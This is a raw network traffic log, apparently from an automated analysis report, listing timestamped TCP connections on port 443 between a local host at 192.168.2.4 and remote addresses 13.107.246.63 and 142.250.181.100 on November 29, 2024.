                                                                                                                                      Nov 29, 2024 23:11:05.799428940 CET4434979113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.799475908 CET49791443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.799654961 CET49791443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.799674034 CET4434979113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.799685001 CET49791443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.799690008 CET4434979113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.802237988 CET49796443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.802258968 CET4434979613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.802344084 CET49796443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.802510977 CET49796443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.802520037 CET4434979613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.902420044 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.902750969 CET49795443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.902775049 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.903264046 CET49795443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.903268099 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.967106104 CET4434979413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.967154026 CET4434979413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.967199087 CET49794443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.967367887 CET49794443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.967367887 CET49794443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.967377901 CET4434979413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.967386007 CET4434979413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.969620943 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.969649076 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.969744921 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.969907999 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.969919920 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.981126070 CET4434979213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.981175900 CET4434979213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.981221914 CET49792443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.981509924 CET49792443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.981515884 CET4434979213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.981523991 CET49792443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.981530905 CET4434979213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.983352900 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.983370066 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.983438015 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.983558893 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.983568907 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.006962061 CET4434979313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.007003069 CET4434979313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.007064104 CET49793443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.007189035 CET49793443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.007204056 CET4434979313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.007213116 CET49793443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.007217884 CET4434979313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.009182930 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.009195089 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.009268045 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.009397030 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.009409904 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.355931044 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.355973959 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.356126070 CET49795443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.356205940 CET49795443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.356220007 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.356228113 CET49795443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.356231928 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.358725071 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.358757019 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:06.358824015 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.358989000 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:06.358999014 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.755026102 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.755572081 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:07.755593061 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.755930901 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:07.755935907 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.762708902 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.762995005 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:07.763005972 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.763381004 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:07.763385057 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.864937067 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.865365028 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:07.865385056 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:07.865791082 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:07.865796089 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.204102039 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.204607010 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.204627037 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.205028057 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.205032110 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.207386971 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.207432032 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.207482100 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.207689047 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.207698107 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.207707882 CET49798443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.207711935 CET4434979813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.207998991 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.208061934 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.208117962 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.208686113 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.208705902 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.208715916 CET49797443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.208724022 CET4434979713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.211041927 CET49801443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.211066961 CET4434980113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.211142063 CET49801443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.211427927 CET49801443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.211440086 CET4434980113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.212380886 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.212398052 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.212455034 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.212558985 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.212573051 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.318432093 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.318483114 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.318523884 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.318625927 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.318633080 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.318639994 CET49799443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.318643093 CET4434979913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.320563078 CET49803443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.320581913 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.320651054 CET49803443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.320785046 CET49803443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.320795059 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.657949924 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.658005953 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.658060074 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.658236980 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.658245087 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.658255100 CET49800443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.658260107 CET4434980013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.661067009 CET49804443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.661089897 CET4434980413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:08.661170959 CET49804443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.661329985 CET49804443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:08.661339998 CET4434980413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:09.927279949 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:09.927807093 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:09.927834988 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:09.928253889 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:09.928258896 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.165812016 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.166330099 CET49803443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.166351080 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.166753054 CET49803443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.166758060 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.362925053 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.363002062 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.363056898 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.363212109 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.363223076 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.363230944 CET49802443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.363234997 CET4434980213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.365916014 CET49805443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.366004944 CET4434980513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.366095066 CET49805443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.366266012 CET49805443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.366301060 CET4434980513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.550944090 CET4434980413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.551386118 CET49804443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.551404953 CET4434980413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.551831961 CET49804443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.551836967 CET4434980413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.619285107 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.619333982 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.619386911 CET49803443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.619535923 CET49803443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.619535923 CET49803443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.619546890 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.619554996 CET4434980313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.621901035 CET49806443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.621918917 CET4434980613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:10.621988058 CET49806443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.622109890 CET49806443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:10.622119904 CET4434980613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.004345894 CET4434980413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.004406929 CET4434980413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.004465103 CET49804443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:11.004605055 CET49804443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:11.004611969 CET4434980413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.004621983 CET49804443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:11.004626036 CET4434980413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.006870985 CET49807443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:11.006933928 CET4434980713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.007024050 CET49807443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:11.007149935 CET49807443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:11.007181883 CET4434980713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.533112049 CET4434979613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.533734083 CET49796443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:11.533749104 CET4434979613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.534126043 CET49796443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:11.534128904 CET4434979613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.900746107 CET4434979613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.900779963 CET4434979613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.900826931 CET49796443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:11.901138067 CET49796443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:11.901145935 CET4434979613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.904304028 CET49808443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:11.904328108 CET4434980813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:11.904382944 CET49808443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:11.904656887 CET49808443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:11.904669046 CET4434980813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:12.146688938 CET4434980513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:12.147069931 CET49805443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:12.147134066 CET4434980513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:12.147469044 CET49805443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:12.147481918 CET4434980513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:12.470093966 CET4434980613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:12.470529079 CET49806443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:12.470549107 CET4434980613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:12.470978975 CET49806443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:12.470983982 CET4434980613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:12.709311962 CET4434980513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:12.709377050 CET4434980513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:12.709429979 CET49805443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:12.709609985 CET49805443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:12.709644079 CET4434980513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:12.709687948 CET49805443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:12.709705114 CET4434980513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:12.712296009 CET49809443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:12.712325096 CET4434980913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:12.712404966 CET49809443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:12.712574005 CET49809443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:12.712588072 CET4434980913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.006017923 CET4434980613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.006062984 CET4434980613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.006129026 CET49806443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.006341934 CET49806443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.006352901 CET4434980613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.006361961 CET49806443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.006366014 CET4434980613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.009211063 CET49810443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.009234905 CET4434981013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.009309053 CET49810443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.009475946 CET49810443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.009488106 CET4434981013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.255451918 CET4434980113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.255934000 CET49801443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.255948067 CET4434980113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.256366014 CET49801443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.256370068 CET4434980113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.704771996 CET4434980813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.705157042 CET49808443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.705178976 CET4434980813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.705728054 CET49808443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.705732107 CET4434980813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.706185102 CET4434980113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.706226110 CET4434980113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.706273079 CET49801443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.706396103 CET49801443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.706403017 CET4434980113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.706413984 CET49801443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.706419945 CET4434980113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.708647013 CET49811443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.708667994 CET4434981113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:13.708748102 CET49811443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.708879948 CET49811443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:13.708890915 CET4434981113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.175839901 CET4434980813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.175890923 CET4434980813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.175956011 CET49808443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.176139116 CET49808443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.176156998 CET4434980813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.176170111 CET49808443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.176173925 CET4434980813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.178889036 CET49812443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.178956985 CET4434981213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.179048061 CET49812443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.179234028 CET49812443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.179267883 CET4434981213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.516233921 CET4434980913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.516772985 CET49809443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.516796112 CET4434980913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.517218113 CET49809443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.517222881 CET4434980913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.547662020 CET4434980713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.548243999 CET49807443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.548291922 CET4434980713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.548659086 CET49807443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.548671961 CET4434980713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.737823963 CET4434981013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.738475084 CET49810443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.738490105 CET4434981013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.738915920 CET49810443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.738919973 CET4434981013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.961010933 CET4434980913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.961078882 CET4434980913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.961143970 CET49809443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.961322069 CET49809443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.961335897 CET4434980913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.961344957 CET49809443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.961349964 CET4434980913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.964152098 CET49813443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.964179039 CET4434981313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.964262962 CET49813443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.964422941 CET49813443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:14.964433908 CET4434981313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.968949080 CET44349790142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.969017029 CET44349790142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:14.969062090 CET49790443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:11:15.108020067 CET4434980713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:15.108071089 CET4434980713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:15.108242989 CET49807443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:15.108462095 CET49807443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:15.108462095 CET49807443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:15.108510971 CET4434980713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:15.108536005 CET4434980713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:15.111181974 CET49814443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:15.111233950 CET4434981413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:15.111341953 CET49814443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:15.111534119 CET49814443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:15.111567020 CET4434981413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:15.219367981 CET4434981013.107.246.63192.168.2.4
